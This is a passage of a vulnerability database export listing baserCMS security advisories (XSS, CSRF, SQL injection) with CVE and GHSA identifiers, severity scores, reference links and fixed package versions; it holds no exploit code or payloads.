scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:00Z/
url https://github.com/baserproject/basercms/commit/60f83054d8131b0ace60716cec7e629b5eb3a8f0
5
reference_url https://github.com/baserproject/basercms/releases/tag/basercms-4.7.5
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:00Z/
url https://github.com/baserproject/basercms/releases/tag/basercms-4.7.5
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-25654
reference_id CVE-2023-25654
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-25654
7
reference_url https://github.com/advisories/GHSA-h4cc-fxpp-pgw9
reference_id GHSA-h4cc-fxpp-pgw9
reference_type
scores
url https://github.com/advisories/GHSA-h4cc-fxpp-pgw9
8
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-h4cc-fxpp-pgw9
reference_id GHSA-h4cc-fxpp-pgw9
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:00Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-h4cc-fxpp-pgw9
fixed_packages
0
url pkg:composer/baserproject/basercms@4.7.5
purl pkg:composer/baserproject/basercms@4.7.5
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-g56w-z9cx-5ygv
7
vulnerability VCID-ggv8-3v9t-mfea
8
vulnerability VCID-jby7-s5ez-dqb3
9
vulnerability VCID-k5qv-4yp3-zbgf
10
vulnerability VCID-khft-xvrw-g3dr
11
vulnerability VCID-mfm9-gsh3-ubg8
12
vulnerability VCID-nxrf-64er-xbfx
13
vulnerability VCID-p695-t9ye-v3ga
14
vulnerability VCID-pd8c-9d7z-zkhg
15
vulnerability VCID-sqr4-v889-tff8
16
vulnerability VCID-u16w-rbuk-ybfs
17
vulnerability VCID-uedz-j2vn-cbea
18
vulnerability VCID-y2sz-c6vb-pkdp
19
vulnerability VCID-zqd4-rdem-jfgk
20
vulnerability VCID-zxns-tzw3-27fr
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.7.5
aliases CVE-2023-25654, GHSA-h4cc-fxpp-pgw9
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-j37y-gws9-ake9
25
url VCID-jby7-s5ez-dqb3
vulnerability_id VCID-jby7-s5ez-dqb3
summary Cross-Site Request Forgery (CSRF) in baserproject/basercms.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-43649
reference_id
reference_type
scores
0
value 0.00118
scoring_system epss
scoring_elements 0.3025
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-43649
1
reference_url https://basercms.net/security/JVN_99052047
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
1
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:21:18Z/
url https://basercms.net/security/JVN_99052047
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/commit/874c55433fead93e0be9df96fd28740f8047c8b6
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
1
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:21:18Z/
url https://github.com/baserproject/basercms/commit/874c55433fead93e0be9df96fd28740f8047c8b6
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-43649
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-43649
5
reference_url https://github.com/advisories/GHSA-fw9x-cqjq-7jx5
reference_id GHSA-fw9x-cqjq-7jx5
reference_type
scores
url https://github.com/advisories/GHSA-fw9x-cqjq-7jx5
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-fw9x-cqjq-7jx5
reference_id GHSA-fw9x-cqjq-7jx5
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
1
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:21:18Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-fw9x-cqjq-7jx5
fixed_packages
0
url pkg:composer/baserproject/basercms@4.8.0
purl pkg:composer/baserproject/basercms@4.8.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-ggv8-3v9t-mfea
7
vulnerability VCID-k5qv-4yp3-zbgf
8
vulnerability VCID-khft-xvrw-g3dr
9
vulnerability VCID-mfm9-gsh3-ubg8
10
vulnerability VCID-nxrf-64er-xbfx
11
vulnerability VCID-p695-t9ye-v3ga
12
vulnerability VCID-sqr4-v889-tff8
13
vulnerability VCID-uedz-j2vn-cbea
14
vulnerability VCID-y2sz-c6vb-pkdp
15
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.8.0
1
url pkg:composer/baserproject/basercms@5.0.0
purl pkg:composer/baserproject/basercms@5.0.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-khft-xvrw-g3dr
8
vulnerability VCID-mfm9-gsh3-ubg8
9
vulnerability VCID-p695-t9ye-v3ga
10
vulnerability VCID-sqr4-v889-tff8
11
vulnerability VCID-y2sz-c6vb-pkdp
12
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.0
aliases CVE-2023-43649, GHSA-fw9x-cqjq-7jx5
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-jby7-s5ez-dqb3
26
url VCID-k575-suuf-7bhf
vulnerability_id VCID-k575-suuf-7bhf
summary
baserCMS vulnerable to stored Cross-site Scripting
Stored cross-site scripting vulnerability in Permission Settings of baserCMS versions prior to 4.7.2 allows a remote authenticated attacker with an administrative privilege to inject an arbitrary script.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-41994
reference_id
reference_type
scores
0
value 0.00143
scoring_system epss
scoring_elements 0.34314
published_at 2026-06-04T12:55:00Z
1
value 0.00143
scoring_system epss
scoring_elements 0.34412
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-41994
1
reference_url https://basercms.net/security/JVN_53682526
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T14:27:38Z/
url https://basercms.net/security/JVN_53682526
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://jvn.jp/en/jp/JVN53682526/index.html
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T14:27:38Z/
url https://jvn.jp/en/jp/JVN53682526/index.html
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2022-41994
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2022-41994
5
reference_url https://github.com/advisories/GHSA-vxwf-79ch-f7f7
reference_id GHSA-vxwf-79ch-f7f7
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-vxwf-79ch-f7f7
fixed_packages
0
url pkg:composer/baserproject/basercms@4.7.2
purl pkg:composer/baserproject/basercms@4.7.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-g56w-z9cx-5ygv
7
vulnerability VCID-ggv8-3v9t-mfea
8
vulnerability VCID-j37y-gws9-ake9
9
vulnerability VCID-jby7-s5ez-dqb3
10
vulnerability VCID-k5qv-4yp3-zbgf
11
vulnerability VCID-khft-xvrw-g3dr
12
vulnerability VCID-mfm9-gsh3-ubg8
13
vulnerability VCID-nxrf-64er-xbfx
14
vulnerability VCID-p695-t9ye-v3ga
15
vulnerability VCID-pd8c-9d7z-zkhg
16
vulnerability VCID-sqr4-v889-tff8
17
vulnerability VCID-u16w-rbuk-ybfs
18
vulnerability VCID-uedz-j2vn-cbea
19
vulnerability VCID-y2sz-c6vb-pkdp
20
vulnerability VCID-zqd4-rdem-jfgk
21
vulnerability VCID-zsgc-fnen-b7a6
22
vulnerability VCID-zxns-tzw3-27fr
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.7.2
aliases CVE-2022-41994, GHSA-vxwf-79ch-f7f7
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-k575-suuf-7bhf
27
url VCID-k5qv-4yp3-zbgf
vulnerability_id VCID-k5qv-4yp3-zbgf
summary
baserCMS has an SQL injection vulnerability in its blog post functionality
baserCMS has a SQL injection vulnerability in blog posts.

### Target
baserCMS 5.2.2 and earlier versions

### Vulnerability

Malicious SQL may be executed in blog posts.

### Countermeasures
Update to the latest version of baserCMS

Please refer to the following page for more information.
https://basercms.net/security/JVN_52157568

### Credits

Mirai Matsumoto@Future Secure Wave, Inc.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-27697
reference_id
reference_type
scores
0
value 0.00013
scoring_system epss
scoring_elements 0.02096
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-27697
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T15:27:51Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T15:27:51Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-vh89-rjph-2g7p
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T15:27:51Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-vh89-rjph-2g7p
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-27697
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-27697
6
reference_url https://github.com/advisories/GHSA-vh89-rjph-2g7p
reference_id GHSA-vh89-rjph-2g7p
reference_type
scores
url https://github.com/advisories/GHSA-vh89-rjph-2g7p
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-27697, GHSA-vh89-rjph-2g7p
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-k5qv-4yp3-zbgf
28
url VCID-khft-xvrw-g3dr
vulnerability_id VCID-khft-xvrw-g3dr
summary
baserCMS has a Cross-site Scripting (XSS) Vulnerability in HTTP 400 Bad Request
XSS vulnerability in HTTP 400 Bad Request in baserCMS.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-46995
reference_id
reference_type
scores
0
value 0.0087
scoring_system epss
scoring_elements 0.75582
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-46995
1
reference_url https://basercms.net/security/JVN_00876083
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN_00876083
2
reference_url https://basercms.net/security/JVN_06274755
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:15Z/
url https://basercms.net/security/JVN_06274755
3
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-46995
reference_id CVE-2024-46995
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-46995
5
reference_url https://github.com/advisories/GHSA-mr7q-fv7j-jcgv
reference_id GHSA-mr7q-fv7j-jcgv
reference_type
scores
url https://github.com/advisories/GHSA-mr7q-fv7j-jcgv
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-mr7q-fv7j-jcgv
reference_id GHSA-mr7q-fv7j-jcgv
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:23:15Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-mr7q-fv7j-jcgv
fixed_packages
0
url pkg:composer/baserproject/basercms@5.1.2
purl pkg:composer/baserproject/basercms@5.1.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-y2sz-c6vb-pkdp
8
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2
aliases CVE-2024-46995, GHSA-mr7q-fv7j-jcgv
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-khft-xvrw-g3dr
29
url VCID-kmpp-6j49-pqfz
vulnerability_id VCID-kmpp-6j49-pqfz
summary
baserproject/basercms vulnerable to cross-site scripting (XSS) vulnerability
There is a cross-site scripting vulnerability on the management system of baserCMS.

This is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users.
If you are eligible, please update to the new version as soon as possible.

### Target
baserCMS 4.7.1 and earlier versions.

### Vulnerability
Execution of malicious JavaScript code may alter the display of the page or leak cookie information.
- In Favorite registration (CVE-2022-39325)
- In Permission Settings (CVE-2022-41994)
- In User group management (CVE-2022-42486)

### Countermeasures
Update to the latest version of baserCMS

### Credits
- Shogo Iyota@Mitsui Bussan Secure Directions, Inc.
- YUYA KOTAKE@CARTA HOLDINGS, INC.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-39325
reference_id
reference_type
scores
0
value 0.00687
scoring_system epss
scoring_elements 0.72163
published_at 2026-06-05T12:55:00Z
1
value 0.00687
scoring_system epss
scoring_elements 0.72122
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-39325
1
reference_url https://basercms.net/security/JVN_53682526
reference_id
reference_type
scores
0
value 4.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T13:54:00Z/
url https://basercms.net/security/JVN_53682526
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 4.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/commit/b6f8a54e90dee51317eddf517b776fe8b4cd3ef6
reference_id
reference_type
scores
0
value 4.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T13:54:00Z/
url https://github.com/baserproject/basercms/commit/b6f8a54e90dee51317eddf517b776fe8b4cd3ef6
4
reference_url https://github.com/baserproject/basercms/releases/tag/basercms-4.7.2
reference_id
reference_type
scores
0
value 4.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/releases/tag/basercms-4.7.2
5
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-395x-wv32-44v5
reference_id
reference_type
scores
0
value 4.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-23T13:54:00Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-395x-wv32-44v5
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2022-39325
reference_id
reference_type
scores
0
value 4.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2022-39325
7
reference_url https://github.com/advisories/GHSA-395x-wv32-44v5
reference_id GHSA-395x-wv32-44v5
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-395x-wv32-44v5
fixed_packages
0
url pkg:composer/baserproject/basercms@4.7.2
purl pkg:composer/baserproject/basercms@4.7.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-g56w-z9cx-5ygv
7
vulnerability VCID-ggv8-3v9t-mfea
8
vulnerability VCID-j37y-gws9-ake9
9
vulnerability VCID-jby7-s5ez-dqb3
10
vulnerability VCID-k5qv-4yp3-zbgf
11
vulnerability VCID-khft-xvrw-g3dr
12
vulnerability VCID-mfm9-gsh3-ubg8
13
vulnerability VCID-nxrf-64er-xbfx
14
vulnerability VCID-p695-t9ye-v3ga
15
vulnerability VCID-pd8c-9d7z-zkhg
16
vulnerability VCID-sqr4-v889-tff8
17
vulnerability VCID-u16w-rbuk-ybfs
18
vulnerability VCID-uedz-j2vn-cbea
19
vulnerability VCID-y2sz-c6vb-pkdp
20
vulnerability VCID-zqd4-rdem-jfgk
21
vulnerability VCID-zsgc-fnen-b7a6
22
vulnerability VCID-zxns-tzw3-27fr
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.7.2
aliases CVE-2022-39325, GHSA-395x-wv32-44v5
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-kmpp-6j49-pqfz
30
url VCID-mfm9-gsh3-ubg8
vulnerability_id VCID-mfm9-gsh3-ubg8
summary
baserCMS has a Cross-site Scripting (XSS) Vulnerability in Blog posts Feature
XSS vulnerability in the Blog posts feature of baserCMS.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-46996
reference_id
reference_type
scores
0
value 0.01236
scoring_system epss
scoring_elements 0.79576
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-46996
1
reference_url https://basercms.net/security/JVN_00876083
reference_id
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:22:34Z/
url https://basercms.net/security/JVN_00876083
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-46996
reference_id CVE-2024-46996
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-46996
4
reference_url https://github.com/advisories/GHSA-66jv-qrm3-vvfg
reference_id GHSA-66jv-qrm3-vvfg
reference_type
scores
url https://github.com/advisories/GHSA-66jv-qrm3-vvfg
5
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-66jv-qrm3-vvfg
reference_id GHSA-66jv-qrm3-vvfg
reference_type
scores
0
value 6.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N
1
value 5.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:P/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-10-24T19:22:34Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-66jv-qrm3-vvfg
fixed_packages
0
url pkg:composer/baserproject/basercms@5.1.2
purl pkg:composer/baserproject/basercms@5.1.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-y2sz-c6vb-pkdp
8
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.1.2
aliases CVE-2024-46996, GHSA-66jv-qrm3-vvfg
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-mfm9-gsh3-ubg8
31
url VCID-nxrf-64er-xbfx
vulnerability_id VCID-nxrf-64er-xbfx
summary
